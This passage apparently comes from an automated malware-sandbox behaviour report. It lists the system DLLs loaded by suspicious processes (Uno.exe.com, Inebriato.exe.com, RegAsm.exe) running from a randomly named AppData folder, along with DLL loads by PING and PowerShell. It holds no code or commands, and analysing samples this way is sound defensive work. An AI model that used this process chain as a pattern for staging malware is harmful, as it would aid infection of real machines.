              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comSection loaded: napinsp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comSection loaded: wshbth.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comSection loaded: nlaapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comSection loaded: winrnr.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comSection loaded: napinsp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comSection loaded: wshbth.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comSection loaded: nlaapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comSection loaded: winrnr.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: aclayers.dll
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: sfc.dll
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: sfc_os.dll
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: aclayers.dll
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: sfc.dll
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: sfc_os.dll
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: wsock32.dll
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
